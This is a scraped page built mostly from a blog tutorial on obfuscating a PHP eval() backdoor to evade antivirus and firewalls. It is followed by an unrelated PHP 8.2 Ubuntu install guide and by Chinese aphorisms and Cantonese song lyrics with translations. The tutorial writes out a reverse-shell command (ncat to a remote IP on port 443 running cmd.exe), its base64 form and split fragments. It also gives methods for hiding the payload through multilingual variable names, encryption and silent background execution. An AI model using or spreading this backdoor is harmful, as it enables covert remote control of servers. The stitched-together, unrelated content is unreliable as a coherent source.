PHP Shell Eval() Backdoor Obfuscation

Introduction

When working with any programing or scripting language you might ask your self is this language could be used for “hacking”, this question in the beginning could be very superficial but let’s take it real. I do love PHP a lot to be honest, I’m using it in everything, in web, cryptography when I want to perform cryptographical tasks and even in backdoors, Its very clear language and its purpose and more in very good way. I asked my self what If we can do something new with this great language, let’s obfuscate a backdoor to avoid detection by AV and at the same time let’s make this code behaves like an ordinary code and from here the idea came.

Walk through the standards

Before starting any thing new you should put your standards and policies first to see how you should build your new theory, for example I put the following standards for me to follow and care about:

Payload delivery
Symantec and Signature based detections
Readability of the code
Command execution workflow
Firewalls

And more but these are my major standards I want to care about them while crafting this backdoor.

Planning for the theory

Now after we knew what we going to do and what standards we should follow we came to the planning section, I wanted to make something new to the security appliances, something isn’t commonly used against these appliances, so, the chances of detection will be decreased. In my plan I decided to follow the following rules:

Using multiple foreign languages which rarely used to write our backdoor.

Every variable with certain languages should have its own reference variable which basically written in different variable, this step will confuse the code more and more.

Variables sequences should be varied, so, debugging or deobfuscating the code now should be harder.

System commands and PHP codes will be used in this mission should be encoded, truncated and every truncated part should be in a single variable, each single variable should has its own reference variable and this reference variable should follow the standards mentioned before, in addition the sequence of truncated encoded string should be varied in sorting, but when decoding it using decoder function it will be concatenated in the right sequence with the reference variable used and we can make a mix of reference and standard variables as we will see later in this article.

The decoder function also should be obfuscated by truncating it following the previous rules, then using it as a variable to decode the encoded string.

Variables names also should consists of special characters like ‘_’ and numbers, for example if we have language like the Chinese language, maybe one word in English translated to two strings in Chinese, so we can used multiple forms and identifying more than single variable with the same name, like:

$最後の4

$最後の3

$最後の_3

$最_後の1

This would confuse the code more and more.

Its optionally and recommended in my point of view to encrypt your obfuscated code then make a backdoor decrypt the obfuscated code and run it immediately, so, your code will be very safe because it’s just decrypt a string then execute that string, but deeply it’s a backdoor. Kindly want to note here that windows installation of PHP is very funny, so, it disables the openssl extension by default when installing but allows eval function 🙂 .. this means if you want to use the encryption method you should make sure that your target enabled the openssl extension, but if your target was links then no worries.

1. Start crafting the command

Yes we will do obfuscating to our code, but even the system command should be executed somehow safely, you can also obfuscate the system command!, but let’s make it simple this time and make a standard payload but with some security standards to avoid detection, first of all let’s list the standards we’ll follow while doing this crafting:

Connecting to our remote host using standard port usually opened and whitelisted in Firewalls .e.g. 443.

Turning off any verbose because we want to make everything silent and at the same time clean in the compromised machine.

Running the command in the background trying to make it silent more and more.

And just for notice, system command may not lead directly to reverse shell, for example you can make the powershell download a ps script then run it in the memory directly and gaining reverse shell, but because here we’re concentrating in the obfuscation we’ll make it as simple as we can, so, we’ll use netcat.

The command I used in this obfuscated payload is:

system(“start /b ncat.exe 192.168.245.213 443 -e cmd.exe”);

And for sure the IP here varied but other than the IP is the same. Now as explained before we should encode, and here the encoded text is:

c3lzdGVtKCJzdGFydCAvYiBuY2F0LmV4ZSAxOTIuMTY4LjI0NS4yMTMgNDQzIC1lIGNtZC5leGUiKTs=

Note: If you did obfuscated a payload then found a base padding like: — == — at the end of the base you can safely remove it as a type of confusing and hiding the identity of the encoding / base, and we did this here.

Let’s discuss how we should use it in our obfuscated code:

c3lzdGVtKCJ || zdGFydCA || vYiBuY2F0LmV4ZS || AxOTIuMTY4L || jI0NS4 || yMTMgNDQzIC1l || IGNtZC5leGUiKTs

We can truncated with non-standard truncation as you can see above, which means every part of the base64 here will be in different bits, so, when sorting it into the variables it will be hard to detect if these strings are related to each other or not, for example:

The encoded PHP system command execution and the system command itself.

So, as you can see in the picture above the encoded payload length varied and the sequence is not the right sequence for this encoding to work, but when we gonna decode it, we’ll put the right sequence — obfuscated surely —

2. Handling the decoding function

As we know, we did encoded the payload which will be executed — including the PHP system command executing function — and now we should do the same with decoding function, if remember what we said in the Planning section about the decoding function, we said that even the decoding function should be obfuscated, truncated and non-sorted also. Let’s take a look at this part of the code:

Before continue we should note again that you can make your own base encoding function and obfuscate it — it would be better — even you can do other techniques like ROT13 and you can develop it too. Let’s continue here and discuss the above code, here we did truncated the function name to many parts trying to hide it and also you may ask: but its in plain text, is it ok? and the answer is yes and no:

Yes, because simply it will be putted in reference variables by the way so it will be hard to find / detect.

No, because we can use techniques like reverse or ROT13 then pass it as function after decoding from these techniques and it would be better.

And now you’ll see that when we going to use it, we’ll use it references which already referenced :), so, it will be like that:

So, now the base64 being used easily as function from the variable which already uses a reference variable mixed with standard variables. Then now it runs the decoding function safely without any problems here.

3. Payload handling while decoding

This part is the easiest part in this techniques, all what you should do is to avoid using the encoded payload part directly, you should use reference variables with the techniques / rules explained before, this make the payload more confused. We can also concatenate the payload by grouping every couple of encoded parts in a group then using it again — with the right sequence of encoded payload to decode it right — we can discuss that in the following code:

4. Obfuscated payload with reference variables

Here I didn’t marked all the payloads but you get the point now, and if you concentrated here specially:

Here we used the variable $最後の3 to store a part of base64_decode function and at the same time we used $最後の4 to be used as a reference to the variable $_變量1 which stores a part of the payload will be executed, so, it will be confusing to use the same variable with changing only one character for very different purpose, and the same for the other variables highlighted, its the art of obfuscation.

5. Executing the magic

Finally now we’ll execute the decoded base64 using eval function as shown:

And now simply when running it, it will give us the reverse shell we want with persistence even if the user hit CTRL + C because we did it in the background if you remember:

6. Final touches

As mentioned you can also use the encryption to hide the entire obfuscated payload, in the following code:

Here we will encode our obfuscated code first to handle it safely in this encryption phase and to avoid bugs, by the way it will be saved inside base64_decode() function, so, if any other function will handle it, it will be the ordinary code without encoding. We’ll take this encrypted / ciphered backdoor now and will do the following:

Here we’re going to decrypt the ciphered obfuscated payload and run it into eval function immediately as you can see.

7. Conclusion

The obfuscation is an art, there are no limits to what you can do, always think crazily and outside the box, be the red and blue teamer then cock your payload and feed it to the system.

Source: CyberGuy

Install PHP 8.2.8 In Ubuntu NGINX Server

PHP 8.2 also includes bug fixes and performance improvements over previous versions like 8.1. We recommend you test your codebase with PHP 8.2 before upgrading in a production setup, just to ensure that everything works as expected.

In this article we shall cover steps that are used in the installation of PHP 8.2 on Ubuntu 22.04|20.04|18.04. The default version of PHP available on OS repositories is usually older than PHP official latest releases. PPA (Personal Package Archive) software repositories for PHP allows you to install newer releases of PHP on your Ubuntu system that are not available in the official repositories of a Linux distribution.

sudo apt update

sudo apt install -y lsb-release gnupg2 ca-certificates apt-transport-https software-properties-common

sudo add-apt-repository ppa:ondrej/php

sudo apt install php8.2-cli php8.2-fpm php8.2-common php8.2-mysql php8.2-pgsql php8.2-zip php8.2-gd php8.2-mbstring php8.2-curl php8.2-xml php8.2-bcmath php8.2-memcached

php -v

PHP 8.2.8 (cli) (built: Jul 8 2023 07:10:21) (NTS)
Copyright (c) The PHP Group
Zend Engine v4.2.8, Copyright (c) Zend Technologies
with Zend OPcache v8.2.8, Copyright (c), by Zend Technologies

Five phrases that need to be contemplated to respond to life #JMCmuse

When Facing Hard Time #jmcmuse by josuamarcelc

Whatever you want to control, actually that’s what will control you, when you want nothing more, the world is yours.

你想控制什么，其实它就会控制你，当你什么都不想要的时候，世界就是你的了。

_{Nǐ xiǎng kòngzhì shénme, qíshí tā jiù huì kòngzhì nǐ, dāng nǐ shénme dōu bùxiǎng yào de shíhòu, shìjiè jiùshì nǐ dele.}

Apapun yang ingin kamu kendalikan, sebenarnya itulah yang akan mengendalikanmu, ketika kamu tidak menginginkan apapun lagi, dunia menjadi milikmu.

Meet because there is a debt to pay, part because the debt has been paid. If in the previous life there was no debt, then in this life it will not meet.

见面是因为有债要还，部分是因为债已经还清了。前世若无债，今生不相见。

_{Jiànmiàn shì yīnwèi yǒu zhài yào hái, bùfèn shì yīnwèi zhài yǐjīng huán qīngle. Qiánshì ruò wú zhài, jīnshēng bù xiāng jiàn.}

Bertemu karena ada hutang yang harus dibayar, berpisah karena hutang sudah dilunasi. Jika di kehidupan sebelumnya tidak berhutang, maka di kehidupan ini tidak akan bertemu.

Do not be afraid to lose everything that is lost to you, the truth is not yours. Also don’t be afraid of getting hurt that can hurt you is the test of your life.

不要害怕失去你失去的一切，真相不属于你。也不要害怕受到伤害，伤害你的是你人生的考验。

_{Bùyào hàipà shīqù nǐ shīqù de yīqiè, zhēnxiàng bù shǔyú nǐ. Yě bùyào hàipà shòudào shānghài, shānghài nǐ de shì nǐ rénshēng de kǎoyàn.}

Jangan takut kehilangan semua yang hilang darimu, sejatinya memang bukan milikmu. Juga jangan takut terluka yang bisa melukaimu adalah ujian hidupmu.

Don’t be greedy, you can’t have everything, also don’t be discouraged you can’t have anything. If it’s yours, there’s no need to fight. If it’s not yours, you won’t even get it.

不要贪婪，你不能拥有一切，也不要气馁，你什么也不能拥有。如果是你的，就没必要争了。如果它不是你的，你甚至不会得到它。

_{Bùyào tānlán, nǐ bùnéng yǒngyǒu yīqiè, yě bùyào qìněi, nǐ shénme yě bùnéng yǒngyǒu. Rúguǒ shì nǐ de, jiù méi bìyào zhēngle. Rúguǒ tā bùshì nǐ de, nǐ shènzhì bù huì dédào tā.}

Jangan serakah, kamu tidak mungkin memiliki segalanya, juga jangan berkecil hati kamu tidak mungkin memiliki apapun. Jika memang milikmu, tidak perlu berjuang. Jika bukan milikmu berjuangpun tidak akan dapat.

Some things God does not allow you to succeed in are to protect you. Remember.. ” Gaining is not necessarily a blessing, losing is not necessarily a disaster.”

上帝不允许你成功的一些事情是为了保护你。记住.. “得到未必是福，失去未必是祸”。

_{Shàngdì bù yǔnxǔ nǐ chénggōng de yīxiē shìqíng shì wèile bǎohù nǐ. Jì zhù.. “Dédào wèibì shì fú, shīqù wèibì shì huò”.}

Beberapa hal, Tuhan tidak mengizinkanmu berhasil melakukannya adalah untuk melindungimu. Ingatlah.. “Mendapatkan belum tentu berkah, kehilangan belum tentu bencana.”

高山低谷 Gou Saan Dai Guk – Mountain And Valley- 林奕匡 – Phil Lam

站在樹林內就如沒氧氣
standing in the forest, just like no oxygen
jaam joi syu lam noi jau yu mut yeung hei

在夕陽下寂寥吧沒權利見你
under the sunset, be lonely, don’t have the rights to see you
Joi jik yeung ha jik liu ba mut kyun lei gin nei

早知高的山低的谷將你我分隔兩地失去人情味
already knew the mountains and valleys separated you and me into two places, losing the human warmth
Jou ji gou dik saan dei dik kuk jeung nei ngo fan gaak leung dei sat heui yan ching mei

你那貴族遊戲我的街角遊記
your game of noble, my journey in the corner of the street
Nei na gwai juk yau hei ngo dik gaai gok yau gei

天真到信真心太兒戲
being so naive i even believe you’re truly love me, it’s too children’s game
Tin jan dou seun jan sam taai yi hei

你快樂過生活我拼命去生存
you live your life happily, i try my best to survive
Nei fai lok gwo sang wut ngo ping meng heui saang chyun

幾多人位於山之巔俯瞰我的疲倦
(how) many people standing in the highest point of mountain and looking down at my tiredness (?)
Gei do yan wai yu saan ji din fu ham ngo dik pei gyun

渴望被成全努力做人誰怕氣喘
wanted to be fulfilled, work hard to live, who is afraid of short of breath ?
Hok mong bei sing chyun nou lik jou yan seui pa hei chyun

但那終點掛在那天邊
but the finish point, hanging in the sky.
Daan na jung dim gwa joi na tin bin

你界定了生活我侮辱了生存
you defined the way to live, i insulted life
Nei gaai ding liu sang wut ngo mou yuk liu saang chyun

只適宜滯於山之谷整理我的凌亂
only suitable for staying in valley and to organise my mess
Ji sik yi jai yu saan ji guk jing lei ngo dik ling lyun

渴望大團圓腳下路程難以削短
wish to have a good ending, (but) the distance under my foot is hard to reduce
Hok mong daai tyun yun geuk ha lou ching naan yi seuk dyun

未見終點也未見恩典我與你極遠
not yet see the finish point, not yet see the grace also, i’m extremely far away to you
Mei gin jung dim ya mei gin yan din ngo yu nei gik yun

愈望愈無望未來沒有我
the more i look the more i feel i have no hopes, the future doesn’t have me
Yut mong yut mou mong mei loi mut yau ngo

在斷崖下盡頭吧樂園未有過
under the cliff, there’s the end right, there’s never paradise
Joi dyun ngaai ha jeun tau ba lok yun mei yau gwo

彷彿天一黑天一光揮發了一句再會只見人下墮
it seems like the time when the sky is dark and when the sky has light, it volatilised a goodbye, only see people falling
Fong fat tin yat haak tin yat gwong fai faat liu yat geui joi wui ji gin yan ha jeui

快慰繼續傳播你都不慰問我
the pleasure is continue to spread, (but) you didn’t express solicitude to me
Faai wai gei juk chyun bo nei dou bat mai man ngo

區分到太清楚太嚴苛
differentiated too clear, too strict
Keui fan dou taai ching cho taai yim ho